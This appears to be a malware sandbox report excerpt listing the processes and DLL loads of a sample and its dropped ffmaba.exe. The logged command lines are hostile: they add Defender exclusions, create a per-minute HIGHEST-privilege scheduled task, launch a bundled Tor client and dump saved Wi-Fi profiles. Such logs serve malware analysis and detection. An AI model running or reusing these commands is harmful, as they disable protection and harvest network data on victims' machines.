Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\yt7dW9nyJK.exe"	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process created: C:\Users\user\Desktop\yt7dW9nyJK.exe "C:\Users\user\Desktop\yt7dW9nyJK.exe"	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\yt7dW9nyJK.exe'	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'yt7dW9nyJK.exe'	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Process created: C:\Users\user\AppData\Local\Temp\ffmaba.exe "C:\Users\user\AppData\Local\Temp\ffmaba.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Temp\ffmaba.exe"
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "ffmaba" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\AppData\Local\Temp\ffmaba.exe" &&START "" "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 3
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn "ffmaba" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe" /rl HIGHEST /f
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Process created: C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe "C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe" -f "C:\Users\user\AppData\Local\77rh3rhsc7\tor\torrc.txt"
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show profiles\|findstr /R /C:"[ ]:[ ]"
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid \| findstr "SSID BSSID Signal"
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show profiles
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /R /C:"[ ]:[ ]"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\netsh.exe netsh wlan show networks mode=bssid
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "SSID BSSID Signal"
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"
Source: C:\Users\user\AppData\Local\Starlabs\ffmaba.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Local\Starlabs\ffmaba.exe"

Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: avicap32.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: msvfw32.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\yt7dW9nyJK.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\ffmaba.exe	Section loaded: kernel.appcore.dll
